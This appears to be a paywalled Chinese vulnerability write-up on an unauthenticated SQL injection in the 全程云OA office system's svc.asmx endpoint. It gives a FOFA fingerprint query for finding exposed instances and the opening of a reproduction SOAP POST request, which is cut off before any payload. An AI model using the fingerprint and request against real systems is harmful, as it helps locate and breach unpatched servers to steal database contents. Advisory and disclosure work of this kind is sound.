超级会员免费看
全程云OA办公系统存在SQL注入漏洞,因svc.asmx页面参数过滤不足,允许未授权攻击者获取数据库敏感信息。文章介绍了漏洞描述、复现方法及修复建议,包括更新官方补丁来解决安全问题。
产品简介
全程云OA为企业提供日常办公管理、公文管理、工作请示、汇报、档案、知识体系、预算控制等26个功能,超过1000个子模块。为企业内部提供高效、畅通的信息渠道,同时也能大力推动公司信息系统发展,提高企业的办公自动化程序和综合管理水平,加快企业信息的流通,提高企业市场竞争能力
漏洞描述
由于全程云OA办公系统 svc.asmx页面参数过滤不当,导致存在SQL注入漏洞,未授权的攻击者可利用该漏洞获取数据库中的敏感信息。
fofa
body=”images/yipeoplehover.png”
漏洞复现
POST /oa/pm/svc.asmx HTTP/1.1
Host:
Content-Type: text/xml; charset=utf-8
Content-Length: 523
SOAPAction: "http://tempuri.org/GetUsersInfo"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:so
订阅专栏 解锁全文
扫一扫
291
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
